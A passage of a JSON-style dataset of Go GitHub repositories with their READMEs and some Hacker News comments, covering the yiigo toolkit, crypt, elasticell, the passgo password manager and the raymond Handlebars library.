world\")\n\nyiigo.Redis().DoFunc(context.Background(), func(ctx context.Context, conn *RedisConn) error {\n if _, err := conn.Do(\"SET\", \"key1\", \"hello\"); err != nil {\n return err\n }\n\n if _, err := conn.Do(\"SET\", \"key2\", \"world\"); err != nil {\n return err\n }\n\n return nil\n})\n\n// other redis\nyiigo.Redis(\"other\").Do(context.Background(), \"SET\", \"test_key\", \"hello world\")\n\nyiigo.Redis(\"other\").DoFunc(context.Background(), func(ctx context.Context, conn *RedisConn) error {\n if _, err := conn.Do(\"SET\", \"key1\", \"hello\"); err != nil {\n return err\n }\n\n if _, err := conn.Do(\"SET\", \"key2\", \"world\"); err != nil {\n return err\n }\n\n return nil\n})\n```\n\n#### Logger\n\n```go\n// register\nyiigo.Init(\n yiigo.WithLogger(yiigo.Default, yiigo.LoggerConfig{\n Filename: \"filename\",\n Options: &yiigo.LoggerOptions{\n Stderr: true,\n },\n }),\n\n yiigo.WithLogger(\"other\", yiigo.LoggerConfig{\n Filename: \"filename\",\n Options: &yiigo.LoggerOptions{\n Stderr: true,\n },\n }),\n)\n\n// default logger\nyiigo.Logger().Info(\"hello world\")\n\n// other logger\nyiigo.Logger(\"other\").Info(\"hello world\")\n```\n\n#### HTTP\n\n```go\n// default client\nyiigo.HTTPGet(context.Background(), \"URL\")\n\n// new client\nclient := yiigo.NewHTTPClient(*http.Client)\nclient.Do(context.Background(), http.MethodGet, \"URL\", nil)\n\n// upload\nform := yiigo.NewUploadForm(\n yiigo.WithFormField(\"title\", \"TITLE\"),\n yiigo.WithFormField(\"description\", \"DESCRIPTION\"),\n yiigo.WithFormFile(\"media\", \"demo.mp4\", func(w io.Writer) error {\n f, err := os.Open(\"demo.mp4\")\n\n if err != nil {\n return err\n }\n\n defer f.Close()\n\n if _, err = io.Copy(w, f); err != nil {\n return err\n }\n\n return nil\n }),\n)\n\nyiigo.HTTPUpload(context.Background(), \"URL\", form)\n```\n\n#### SQL Builder\n\n> \ud83d\ude0a \u4e3a\u4e0d\u60f3\u624b\u5199SQL\u7684\u4f60\u751f\u6210SQL\u8bed\u53e5\uff0c\u7528\u4e8e `sqlx` \u7684\u76f8\u5173\u65b9\u6cd5\uff1b\n>\n> \u26a0\ufe0f \u4f5c\u4e3a\u8f85\u52a9\u65b9\u6cd5\uff0c\u76ee\u524d\u652f\u6301\u7684\u7279\u6027\u6709\u9650\uff0c\u590d\u6742\u7684SQL\uff08\u5982\uff1a\u5b50\u67e5\u8be2\u7b49\uff09\u8fd8\u9700\u81ea\u5df1\u624b\u5199\n\n```go\nbuilder := yiigo.NewMySQLBuilder()\n// builder := yiigo.NewSQLBuilder(yiigo.MySQL)\n```\n\n- Query\n\n```go\nctx := context.Background()\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Where(\"id = ?\", 1),\n).ToQuery(ctx)\n// SELECT * FROM user WHERE id = ?\n// [1]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Where(\"name = ? AND age > ?\", \"shenghui0779\", 20),\n).ToQuery(ctx)\n// SELECT * FROM user WHERE name = ? AND age > ?\n// [shenghui0779 20]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.WhereIn(\"age IN (?)\", []int{20, 30}),\n).ToQuery(ctx)\n// SELECT * FROM user WHERE age IN (?, ?)\n// [20 30]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Select(\"id\", \"name\", \"age\"),\n yiigo.Where(\"id = ?\", 1),\n).ToQuery(ctx)\n// SELECT id, name, age FROM user WHERE id = ?\n// [1]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Distinct(\"name\"),\n yiigo.Where(\"id = ?\", 1),\n).ToQuery(ctx)\n// SELECT DISTINCT name FROM user WHERE id = ?\n// [1]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.LeftJoin(\"address\", \"user.id = address.user_id\"),\n yiigo.Where(\"user.id = ?\", 1),\n).ToQuery(ctx)\n// SELECT * FROM user LEFT JOIN address ON user.id = address.user_id WHERE user.id = ?\n// [1]\n\nbuilder.Wrap(\n yiigo.Table(\"address\"),\n yiigo.Select(\"user_id\", \"COUNT(*) AS total\"),\n yiigo.GroupBy(\"user_id\"),\n yiigo.Having(\"user_id = ?\", 1),\n).ToQuery(ctx)\n// SELECT user_id, COUNT(*) AS total FROM address GROUP BY user_id HAVING user_id = ?\n// [1]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Where(\"age > ?\", 20),\n yiigo.OrderBy(\"age ASC\", \"id DESC\"),\n yiigo.Offset(5),\n yiigo.Limit(10),\n).ToQuery(ctx)\n// SELECT * FROM user WHERE age > ? ORDER BY age ASC, id DESC LIMIT ? OFFSET ?\n// [20, 10, 5]\n\nwrap1 := builder.Wrap(\n Table(\"user_1\"),\n Where(\"id = ?\", 2),\n)\n\nbuilder.Wrap(\n Table(\"user_0\"),\n Where(\"id = ?\", 1),\n Union(wrap1),\n).ToQuery(ctx)\n// (SELECT * FROM user_0 WHERE id = ?) UNION (SELECT * FROM user_1 WHERE id = ?)\n// [1, 2]\n\nbuilder.Wrap(\n Table(\"user_0\"),\n Where(\"id = ?\", 1),\n UnionAll(wrap1),\n).ToQuery(ctx)\n// (SELECT * FROM user_0 WHERE id = ?) UNION ALL (SELECT * FROM user_1 WHERE id = ?)\n// [1, 2]\n\nbuilder.Wrap(\n Table(\"user_0\"),\n WhereIn(\"age IN (?)\", []int{10, 20}),\n Limit(5),\n Union(\n builder.Wrap(\n Table(\"user_1\"),\n Where(\"age IN (?)\", []int{30, 40}),\n Limit(5),\n ),\n ),\n).ToQuery(ctx)\n// (SELECT * FROM user_0 WHERE age IN (?, ?) LIMIT ?) UNION (SELECT * FROM user_1 WHERE age IN (?, ?) LIMIT ?)\n// [10, 20, 5, 30, 40, 5]\n```\n\n- Insert\n\n```go\nctx := context.Background()\n\ntype User struct {\n ID int `db:\"-\"`\n Name string `db:\"name\"`\n Age int `db:\"age\"`\n Phone string `db:\"phone,omitempty\"`\n}\n\nbuilder.Wrap(Table(\"user\")).ToInsert(ctx, &User{\n Name: \"yiigo\",\n Age: 29,\n})\n// INSERT INTO user (name, age) VALUES (?, ?)\n// [yiigo 29]\n\nbuilder.Wrap(yiigo.Table(\"user\")).ToInsert(ctx, yiigo.X{\n \"name\": \"yiigo\",\n \"age\": 29,\n})\n// INSERT INTO user (name, age) VALUES (?, ?)\n// [yiigo 29]\n```\n\n- Batch Insert\n\n```go\nctx := context.Background()\n\ntype User struct {\n ID int `db:\"-\"`\n Name string `db:\"name\"`\n Age int `db:\"age\"`\n Phone string `db:\"phone,omitempty\"`\n}\n\nbuilder.Wrap(Table(\"user\")).ToBatchInsert(ctx, []*User{\n {\n Name: \"shenghui0779\",\n Age: 20,\n },\n {\n Name: \"yiigo\",\n Age: 29,\n },\n})\n// INSERT INTO user (name, age) VALUES (?, ?), (?, ?)\n// [shenghui0779 20 yiigo 29]\n\nbuilder.Wrap(yiigo.Table(\"user\")).ToBatchInsert(ctx, []yiigo.X{\n {\n \"name\": \"shenghui0779\",\n \"age\": 20,\n },\n {\n \"name\": \"yiigo\",\n \"age\": 29,\n },\n})\n// INSERT INTO user (name, age) VALUES (?, ?), (?, ?)\n// [shenghui0779 20 yiigo 29]\n```\n\n- Update\n\n```go\nctx := context.Background()\n\ntype User struct {\n Name string `db:\"name\"`\n Age int `db:\"age\"`\n Phone string `db:\"phone,omitempty\"`\n}\n\nbuilder.Wrap(\n Table(\"user\"),\n Where(\"id = ?\", 1),\n).ToUpdate(ctx, &User{\n Name: \"yiigo\",\n Age: 29,\n})\n// UPDATE user SET name = ?, age = ? WHERE id = ?\n// [yiigo 29 1]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Where(\"id = ?\", 1),\n).ToUpdate(ctx, yiigo.X{\n \"name\": \"yiigo\",\n \"age\": 29,\n})\n// UPDATE user SET name = ?, age = ? WHERE id = ?\n// [yiigo 29 1]\n\nbuilder.Wrap(\n yiigo.Table(\"product\"),\n yiigo.Where(\"id = ?\", 1),\n).ToUpdate(ctx, yiigo.X{\n \"price\": yiigo.Clause(\"price * ? + ?\", 2, 100),\n})\n// UPDATE product SET price = price * ? + ? WHERE id = ?\n// [2 100 1]\n```\n\n- Delete\n\n```go\nctx := context.Background()\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Where(\"id = ?\", 1),\n).ToDelete(ctx)\n// DELETE FROM user WHERE id = ?\n// [1]\n\nbuilder.Wrap(Table(\"user\")).ToTruncate(ctx)\n// TRUNCATE user\n```\n\n## Documentation\n\n- [API Reference](https://pkg.go.dev/github.com/shenghui0779/yiigo)\n- [Example](https://github.com/shenghui0779/tplgo)\n\n**Enjoy \ud83d\ude0a**\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "xordataexchange/crypt", "link": "https://github.com/xordataexchange/crypt", "tags": [], "stars": 513, "description": "Store and retrieve encrypted configs from etcd or consul", "lang": "Go", "repo_lang": "", "readme": "# crypt\n\nYou can use crypt as a command line tool or as a configuration library:\n\n* [crypt cli](bin/crypt)\n* [crypt/config](config)\n\n## Demo\n\nWatch Kelsey explain `crypt` in this quick 5 minute video:\n\n[![Crypt Demonstration Video](https://img.youtube.com/vi/zYpqqfuGwW8/0.jpg)](https://www.youtube.com/watch?v=zYpqqfuGwW8)\n\n## Generating gpg keys and keyrings\n\nThe crypt cli and config package require gpg keyrings. \n\n### Create a key and keyring from a batch file\n\n```\nvim app.batch\n```\n\n```\n%echo Generating a configuration OpenPGP key\nKey-Type: default\nSubkey-Type: default\nName-Real: app\nName-Comment: app configuration key\nName-Email: app@example.com\nExpire-Date: 0\n%pubring .pubring.gpg\n%secring .secring.gpg\n%commit\n%echo done\n```\n\nRun the following command:\n\n```\ngpg2 --batch --armor --gen-key app.batch\n```\n\nYou should now have two keyrings, `.pubring.gpg` which contains the public keys, and `.secring.gpg` which contains the private keys.\n\n> Note the private key is not protected by a passphrase.\n", "readme_type": "markdown", "hn_comments": "I had always wondered how these service discovery tools handled the encryption of data you put in them. I guess now I know! :)Before this was created were people just doing an encrypt/decrypt on in/out in their application code?Awesome project, thanks for sharing.Looks like it takes a similar approach as the hiera eyaml project (it also encrypts on a per-key basis using gpg) which I've found to be really nice to work with in the past (as opposed to other tools that use symmetric encryption or encrypt the entire blob of all secret keys together). Glad to see a tool that does this with etcd and consul, gives the same benefits without a centralized puppetmaster.Any plans for clients in other languages? Or if you're not planning to build would you accept PR's for them?Another great and needed product written in Go. Nice work!!This is interesting, I'm happy that the tool be available as a library.As another point of reference an HTTP load balancer that mailgun built and uses, called vulcan[1], uses secretbox[2] to encrypt secrets into etcd. There are no good docs on how to use this in practice with vulcanctl so I will need need to ask them to document that :)[1] https://github.com/mailgun/vulcand[2] http://godoc.org/code.google.com/p/go.crypto/nacl/secretbox\"After encryption it is gzipped\" is a red flag. After encryption it should be noise, why try to compress it?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "deepfabric/elasticell", "link": "https://github.com/deepfabric/elasticell", "tags": ["raft", "distributed-systems", "distributed-database", "redis", "golang", "key-value"], "stars": 513, "description": "Elastic Key-Value Storage With Strong Consistency and Reliability", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/deepfabric/elasticell.svg?branch=master)](https://travis-ci.org/deepfabric/elasticell)\r\n[![Go Report Card](https://goreportcard.com/badge/github.com/deepfabric/elasticell)](https://goreportcard.com/report/github.com/deepfabric/elasticell)\r\n![Project Status](https://img.shields.io/badge/status-alpha-yellow.svg)\r\n\r\n## What is Elasticell?\r\n\r\nElasticell is a distributed NoSQL database with strong consistency and reliability.\r\n\r\n- __Compatible with Redis protocol__\r\nUse Elasticell as Redis. You can replace Redis with Elasticell to power your application without changing a single line of code in most cases([unsupport-redis-commands](./docs/unsupport-command.md)).\r\n\r\n- __Horizontal scalability__\r\nGrow Elasticell as your business grows. You can increase the capacity simply by adding more machines.\r\n\r\n- __Strong consistent persistence storage__\r\nElasticell put your data on multiple machines as replication without worrying about consistency. Elasticell makes your application use redis as a database and not just only the cache.\r\n\r\n- __High availability__\r\nAll of the three components, PD, Cell and Proxy, can tolerate the failure of some instances without impacting the availability of the entire cluster.\r\n\r\n\r\n## Roadmap\r\n\r\nRead the [Roadmap](./docs/ROADMAP.md).\r\n\r\n## Quick start\r\n\r\nRead the [Quick Start](./docs/user-guide/quick-start.md)\r\n\r\n## Documentation\r\n\r\n+ [English](http://elasticell.readthedocs.io/en/latest/)\r\n+ [\u7b80\u4f53\u4e2d\u6587](http://elasticell.readthedocs.io/zh/latest/)\r\n\r\n## Architecture\r\n\r\n![architecture](./docs/imgs/architecture.png)\r\n\r\n## Contributing\r\n\r\nTODO\r\n\r\n## License\r\n\r\nElasticell is under the Apache 2.0 license. See the [LICENSE](./LICENSE) file for details.\r\n\r\n## Acknowledgments\r\n\r\n- Thanks [etcd](https://github.com/coreos/etcd) for providing the raft implementation.\r\n- Thanks [tidb](https://github.com/pingcap/tidb) for providing the multi-raft implementation.\r\n- Thanks [RocksDB](https://github.com/facebook/rocksdb) for their powerful storage engines.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ejcx/passgo", "link": "https://github.com/ejcx/passgo", "tags": ["password-vault", "passgo", "golang"], "stars": 513, "description": "Simple golang password manager.", "lang": "Go", "repo_lang": "", "readme": "# passgo\nstores, retrieves, generates, and synchronizes passwords and files securely and is written in Go! It is inspired by https://passwordstore.org but has a few key differences. The most important difference is passgo is not GPG based. Instead it uses a master password to securely store your passwords. It also supports encrypting arbitrary files.\n\n\n\npassgo is meant to be secure enough that you can publicly post your vault. I've started publishing my passwords [here](https://github.com/ejcx/passwords.git).\n\n## Installation\n\n`passgo` requires Go version 1.11 or later.\n\n```bash\n(cd; GO111MODULE=on go install github.com/ejcx/passgo/v2)\n```\n\n## Getting started with passgo\n\nCreate a vault and specify the directory to store passwords in. You will be prompted for your master password:\n\n```bash\n$ passgo init\nPlease enter a strong master password:\n2019/02/23 16:54:31 Created directory to store passwords: ~/.passgo\n```\n\nFinally, to learn more you can either read about the commands listed in this README or run:\n\n```bash\npassgo help\n```\n\nThe `--help` argument can be used on any subcommand to describe it and see documentation or examples.\n\n## Configuring passgo\nThe `PASSGODIR` environment variable specifies the directory that your vault is in.\n\nI store my vault in the default location `~/.passgo`. All subcommands will respect this environment variable, including `init`\n\n\n## COMMANDS\n\n### Listing Passwords\n```\n$ passgo\n\u251c\u2500\u2500money\n| \u2514\u2500\u2500mint.com\n\u2514\u2500\u2500another\n \u2514\u2500\u2500another.com\n```\n\nThis basic command is used to print out the contents of your password vault. It doesn't require you to enter your master password.\n\n\n### Initializing Vault\n```\n$ passgo init\n```\nInit should only be run one time, before running any other command. It is used for generating your master public private keypair.\n\nBy default, passgo will create your password vault in the `.passgo` directory within your home directory. You can override this location using the `PASSGODIR` environment variable.\n\n\n\n### Inserting a password\n```\n$ passgo insert money/mint.com\nEnter password for money/mint.com: \n```\n\nInserting a password in to your vault is easy. If you wish to group multiple entries together, it can be accomplished by prepending a group name followed by a slash to the pass-name. \n\nHere we are adding mint.com to the password store within the money group.\n\n\n### Inserting a file\n```\n$ passgo insert money/budget.csv budget.csv\n```\n\nAdding a file works almost the same as insert. Instead it has an extra argument. The file that you want to add to your vault is the final argument. \n\n\n### Retrieving a password\n```\n$ passgo show money/mint.com\nEnter master password:\ndolladollabills$$1\n```\n\nShow is used to display a password in standard out.\n\n\t\n### Rename a password\n```\n$ passgo rename mney/mint.com\nEnter new site name for mney/mint.com: money/mint.com\n```\n\nIf a password is added with the wrong name it can be updated later. Here we rename our mint.com site after misspelling the group name.\n\n\n### Updating a password\n```\n$ passgo edit money/mint.com\nEnter new password for money/mint.com:\n```\n\nIf you want to securely update a password for an already existing site, the edit command is helpful.\n\n\n\n### Generating a password\n```\n$ passgo generate\n%L4^!s,Rry!}s:UPasswords became hard to manage... now you have to choose >>different<< password for every site... Who can remember all those passwords? Only a password manager...Related to password security: any of you guys using Chrome's ability to sync passwords to \"Google cloud\"?I just started using it a few weeks ago. Supposedly it uses a password to encrypt the data, but I still don't feel too confident syncing them there. On the other hand.. damn it's so convenient between multiple devices.I got an email from Bitbucket earlier today warning me about unusual behavior on my account as a result of reused credentials. Is it an attack across several version-control services?just a random tidbit.. but the system currently allows you to set your password to what you previously hadThis is far better than TeamViewer's response to the same threat lately.What the page doesn't tell me is: What is their definition of an \"affected\" account?Obviously one where an attempt was made, and succeeded, would count as affected.But would an account where an attempt was made, and failed, also count?What if the userid and password are correct, but 2FA stopped the attack on an account. Is that account affected, in their view?I hadn't noticed that Github started supporting U2F. Nice to finally use my keys for something other than Google accounts.\"We immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts.\"I feel like sites should somehow preemptively disable passwords that have leaked publically. Is there a simple way for them to do so without downloading every leak themself? Is there a simple way for whitehats to help out? Whitehat means you can't test the site without their permission, but someone could have a database that they provide partial access to for sites without leaking and spreading it further themself?Here's an idea I just thought of: sites should have a standardized, secondary place to log in, where if the login is correct it automatically disables the password and requires a reset. \"Report a compromised account\", as it were. Anyone (or maybe specific whitehat groups) should have explicit permission to try any logins they want there: after all, if they succeed in logging in then the right thing happens and the account is locked. It's impossible to gain any illicit advantage from such access because any correct credentials are locked as soon as you try them. (Is this assumption robust?) So whitehats could then take lists and throw them against sites that implement this standard, but no attackers can gain from this.The only problem I see is that disabling rate limits would open you to DOS (also if multiple people use the same list, although better coordination would help solve that): maybe allow bulk uploads which take less bandwidth overall.Does this idea have any value?I received this e-mail and had my password reset by Github. Based on the \"security history\" shown in my Github account's setting page, my account wasn't compromised as there was no login activity during the past week.I'm thinking that this is fallout from the LinkedIn breach, because this is the first high-profile breach which includes one of my e-mail addresses. (How do I know this? I'm using haveibeenpwned.com -- a free service that I highly suggest registering with.)Anecdote: I use an email account and a relatively simple password (3 relatively common words together) on LinkedIn. I don't use that email account much, but it was affected by the Linkedin hack. Today I get an email saying my Twitter account was accessed suspiciously (same credentials).Power of the network effect that I won't leave Linkedin, and wouldn't think twice before spending money on the platform if I needed to recruit someone or do b2b sales. But screw Linkedin for not taking proper precautions.> The most important difference is passgo is not GPG based. Instead it uses a master password to securely store your passwords.\"Instead\" here seems to imply that GPG cannot securely store data in a password-protected file, which it can. (See the --symmetric option.)It just simply uses a library, and perhaps a custom serialization format / a different format from what GPG uses.One of the reasons why I encrypt my keyring with GPG (and I use a tool that uses/wraps GPG) is because I can recover the keyring then with only GPG: I don't need the actual keyring program, just GPG and the password.Yay a password manager I might actually use, very impressed so far.When I use passgo, how do I collect my $200?edit: Now that I've read the commit message; :(A neat idea, but then I think wouldn't it be clever to introduce such a tool with a backdoor, and then convince people to use it to store their passwords publicly? I'm not accusing this project of anything nefarious, but bugs happen, and a security review wouldn't be a bad idea. Not to mention some unit tests, maybe? :)I'm still on the fence about password managers. I always worry that I'll end up on a computer without my passwords and not be able to logon.Seems interesting but why not to use GPG?Very nice. I like the key feature being that your encrypted vault can be publicly posted. In a team environment, does it make sense to share the master password with all team members? Or is passgo designed for just the individual in mind?I have been looking at https://www.vaultproject.io for team credential storage and sharing.Shameless self plug: https://github.com/creshal/yspavePassword manager that is actually safe against attackers with access to your data at rest by encrypting everything (with authentication), including metadata.Why aren't the site names encrypted too?Users are encouraged to store their password files publicly, and yet the files contain a plaintext list of sites that the user has logins to!Seems a serious privacy breach.As a Go developer, I'm curious. Why is it that whenever a project built in Go is submitted to HN, the title mentions that it's built in Go? What makes the language special that it's worth mentioning?I've been using `pass` for the past few years (I wrote a post on setting it up on OSX which has been fairly popular [0]). However last month I switched to 1Password (I signed up to the family plan trial - I'm not set on it though).The main thing I like about 1Password is the browser integration. It just makes life so much easier being able to click a button and have the password automatically entered into the form. I have a script ([1] - should be easy to adapt for this) which would poll Chrome for the current URL, decrypt or generate the password, and copy it to the clipboard - but clicking a button is a lot less friction.1Password also has a xkcd-style password generator option, which is great for things like Netflix that you need to type in on TVs and such.The main reason why I signed up for 1Password was so I could use it with my family, but the browser extensions only work on OS X 10.10+, so that rules out 2/3 family members (who run Windows 10 and OS X 10.6). You can access the passwords online, but it's no way near as user friendly. If anyone has a good recommendation of an alternative (I'd prefer open source), let me know![0] http://www.stackednotion.com/blog/2012/09/10/setting-up-pass...[1] https://github.com/lucaspiller/passosxSimple alternative: storing passwords in gpg encrypted files and using emacs.Emacs has EasyPG so when you create a file with .gpg extension and try to save it prompts you for a password to encrypt this file with. Similarly if you open a .gpg file it asks you for a password for decrypting it. This way your only dependency is emacs and you can store passwords file wherever you like. And you don't expose names of sites you need passwords for.The code looks very clean and well organized. It appears to be doing things as simply and correctly as possible.A 5 minute glance through the code didn't reveal any vulnerabilities. That's a better result than most.For newbies, it would be helpful to explain how to retrieve the encrypted password, aka ./passgo www.example.com. Didn't see it listed on the help and github page.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "aymerick/raymond", "link": "https://github.com/aymerick/raymond", "tags": ["go", "handlebars"], "stars": 513, "description": "Handlebars for golang", "lang": "Go", "repo_lang": "", "readme": "# raymond [![Build Status](https://secure.travis-ci.org/aymerick/raymond.svg?branch=master)](http://travis-ci.org/aymerick/raymond) [![GoDoc](https://godoc.org/github.com/aymerick/raymond?status.svg)](http://godoc.org/github.com/aymerick/raymond)\n\nHandlebars for [golang](https://golang.org) with the same features as [handlebars.js](http://handlebarsjs.com) `3.0`.\n\nThe full API documentation is available here: .\n\n![Raymond Logo](https://github.com/aymerick/raymond/blob/master/raymond.png?raw=true \"Raymond\")\n\n\n# Table of Contents\n\n- [Quick Start](#quick-start)\n- [Correct Usage](#correct-usage)\n- [Context](#context)\n- [HTML Escaping](#html-escaping)\n- [Helpers](#helpers)\n - [Template Helpers](#template-helpers)\n - [Built-In Helpers](#built-in-helpers)\n - [The `if` block helper](#the-if-block-helper)\n - [The `unless` block helper](#the-unless-block-helper)\n - [The `each` block helper](#the-each-block-helper)\n - [The `with` block helper](#the-with-block-helper)\n - [The `lookup` helper](#the-lookup-helper)\n - [The `log` helper](#the-log-helper)\n - [The `equal` helper](#the-equal-helper)\n - [Block Helpers](#block-helpers)\n - [Block Evaluation](#block-evaluation)\n - [Conditional](#conditional)\n - [Else Block Evaluation](#else-block-evaluation)\n - [Block Parameters](#block-parameters)\n - [Helper Parameters](#helper-parameters)\n - [Automatic conversion](#automatic-conversion)\n - [Options Argument](#options-argument)\n - [Context Values](#context-values)\n - [Helper Hash Arguments](#helper-hash-arguments)\n - [Private Data](#private-data)\n - [Utilites](#utilites)\n - [`Str()`](#str)\n - [`IsTrue()`](#istrue)\n- [Context Functions](#context-functions)\n- [Partials](#partials)\n - [Template Partials](#template-partials)\n - [Global Partials](#global-partials)\n - [Dynamic Partials](#dynamic-partials)\n - [Partial Contexts](#partial-contexts)\n - [Partial Parameters](#partial-parameters)\n- [Utility Functions](#utility-functions)\n- [Mustache](#mustache)\n- [Limitations](#limitations)\n- [Handlebars Lexer](#handlebars-lexer)\n- [Handlebars Parser](#handlebars-parser)\n- [Test](#test)\n- [References](#references)\n- [Others Implementations](#others-implementations)\n\n\n## Quick Start\n\n $ go get github.com/aymerick/raymond\n\nThe quick and dirty way of rendering a handlebars template:\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/aymerick/raymond\"\n)\n\nfunc main() {\n tpl := `
\n

{{title}}

\n
\n {{body}}\n
\n
\n`\n\n ctx := map[string]string{\n \"title\": \"My New Post\",\n \"body\": \"This is my first post!\",\n }\n\n result, err := raymond.Render(tpl, ctx)\n if err != nil {\n panic(\"Please report a bug :)\")\n }\n\n fmt.Print(result)\n}\n```\n\nDisplays:\n\n```html\n
\n

My New Post

\n
\n This is my first post!\n
\n
\n```\n\nPlease note that the template will be parsed everytime you call `Render()` function. So you probably want to read the next section.\n\n\n## Correct Usage\n\nTo avoid parsing a template several times, use the `Parse()` and `Exec()` functions:\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/aymerick/raymond\"\n)\n\nfunc main() {\n source := `
\n

{{title}}

\n
\n {{body}}\n
\n
\n`\n\n ctxList := []map[string]string{\n {\n \"title\": \"My New Post\",\n \"body\": \"This is my first post!\",\n },\n {\n \"title\": \"Here is another post\",\n \"body\": \"This is my second post!\",\n },\n }\n\n // parse template\n tpl, err := raymond.Parse(source)\n if err != nil {\n panic(err)\n }\n\n for _, ctx := range ctxList {\n // render template\n result, err := tpl.Exec(ctx)\n if err != nil {\n panic(err)\n }\n\n fmt.Print(result)\n }\n}\n\n```\n\nDisplays:\n\n```html\n
\n

My New Post

\n
\n This is my first post!\n
\n
\n
\n

Here is another post

\n
\n This is my second post!\n
\n
\n```\n\nYou can use `MustParse()` and `MustExec()` functions if you don't want to deal with errors:\n\n```go\n// parse template\ntpl := raymond.MustParse(source)\n\n// render template\nresult := tpl.MustExec(ctx)\n```\n\n\n## Context\n\nThe rendering context can contain any type of values, including `array`, `slice`, `map`, `struct` and `func`.\n\nWhen using structs, be warned that only exported fields are accessible. However you can access exported fields in template with their lowercase names. For example, both `{{author.firstName}}` and `{{Author.FirstName}}` references give the same result, as long as `Author` and `FirstName` are exported struct fields.\n\nMore, you can use the `handlebars` struct tag to specify a template variable name different from the struct field name.\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/aymerick/raymond\"\n)\n\nfunc main() {\n source := `
\n

By {{author.firstName}} {{author.lastName}}

\n
{{body}}
\n\n

Comments

\n\n {{#each comments}}\n

By {{author.firstName}} {{author.lastName}}

\n
{{content}}
\n {{/each}}\n
`\n\n type Person struct {\n FirstName string\n LastName string\n }\n\n type Comment struct {\n Author Person\n Body string `handlebars:\"content\"`\n }\n\n type Post struct {\n Author Person\n Body string\n Comments []Comment\n }\n\n ctx := Post{\n Person{\"Jean\", \"Valjean\"},\n \"Life is difficult\",\n []Comment{\n Comment{\n Person{\"Marcel\", \"Beliveau\"},\n \"LOL!\",\n },\n },\n }\n\n output := raymond.MustRender(source, ctx)\n\n fmt.Print(output)\n}\n```\n\nOutput:\n\n```html\n
\n

By Jean Valjean

\n
Life is difficult
\n\n

Comments

\n\n

By Marcel Beliveau

\n
LOL!
\n
\n```\n\n## HTML Escaping\n\nBy default, the result of a mustache expression is HTML escaped. Use the triple mustache `{{{` to output unescaped values.\n\n```go\nsource := `
\n

{{title}}

\n
\n {{{body}}}\n
\n
\n`\n\nctx := map[string]string{\n \"title\": \"All about

Tags\",\n \"body\": \"

This is a post about <p> tags

\",\n}\n\ntpl := raymond.MustParse(source)\nresult := tpl.MustExec(ctx)\n\nfmt.Print(result)\n```\n\nOutput:\n\n```html\n
\n

All about <p> Tags

\n
\n

This is a post about <p> tags

\n
\n
\n```\n\nWhen returning HTML from a helper, you should return a `SafeString` if you don't want it to be escaped by default. When using `SafeString` all unknown or unsafe data should be manually escaped with the `Escape` method.\n\n```go\nraymond.RegisterHelper(\"link\", func(url, text string) raymond.SafeString {\n return raymond.SafeString(\"\" + raymond.Escape(text) + \"\")\n})\n\ntpl := raymond.MustParse(\"{{link url text}}\")\n\nctx := map[string]string{\n \"url\": \"http://www.aymerick.com/\",\n \"text\": \"This is a cool website\",\n}\n\nresult := tpl.MustExec(ctx)\nfmt.Print(result)\n```\n\nOutput:\n\n```html\nThis is a <em>cool</em> website\n```\n\n\n## Helpers\n\nHelpers can be accessed from any context in a template. You can register a helper with the `RegisterHelper` function.\n\nFor example:\n\n```html\n
\n

By {{fullName author}}

\n
{{body}}
\n\n

Comments

\n\n {{#each comments}}\n

By {{fullName author}}

\n
{{body}}
\n {{/each}}\n
\n```\n\nWith this context and helper:\n\n```go\nctx := map[string]interface{}{\n \"author\": map[string]string{\"firstName\": \"Jean\", \"lastName\": \"Valjean\"},\n \"body\": \"Life is difficult\",\n \"comments\": []map[string]interface{}{{\n \"author\": map[string]string{\"firstName\": \"Marcel\", \"lastName\": \"Beliveau\"},\n \"body\": \"LOL!\",\n }},\n}\n\nraymond.RegisterHelper(\"fullName\", func(person map[string]string) string {\n return person[\"firstName\"] + \" \" + person[\"lastName\"]\n})\n```\n\nOutputs:\n\n```html\n
\n

By Jean Valjean

\n
Life is difficult
\n\n

Comments

\n\n

By Marcel Beliveau

\n
LOL!
\n
\n```\n\nHelper arguments can be any type.\n\nThe following example uses structs instead of maps and produces the same output as the previous one:\n\n```html\n
\n

By {{fullName author}}

\n
{{body}}
\n\n

Comments

\n\n {{#each comments}}\n

By {{fullName author}}

\n
{{body}}
\n {{/each}}\n
\n```\n\nWith this context and helper:\n\n```go\ntype Post struct {\n Author Person\n Body string\n Comments []Comment\n}\n\ntype Person struct {\n FirstName string\n LastName string\n}\n\ntype Comment struct {\n Author Person\n Body string\n}\n\nctx := Post{\n Person{\"Jean\", \"Valjean\"},\n \"Life is difficult\",\n []Comment{\n Comment{\n Person{\"Marcel\", \"Beliveau\"},\n \"LOL!\",\n },\n },\n}\n\nraymond.RegisterHelper(\"fullName\", func(person Person) string {\n return person.FirstName + \" \" + person.LastName\n})\n```\n\nYou can unregister global helpers with `RemoveHelper` and `RemoveAllHelpers` functions:\n\n```go\nraymond.RemoveHelper(\"fullname\")\n```\n\n```go\nraymond.RemoveAllHelpers()\n```\n\n\n### Template Helpers\n\nYou can register a helper on a specific template, and in that case that helper will be available to that template only:\n\n```go\ntpl := raymond.MustParse(\"User: {{fullName user.firstName user.lastName}}\")\n\ntpl.RegisterHelper(\"fullName\", func(firstName, lastName string) string {\n return firstName + \" \" + 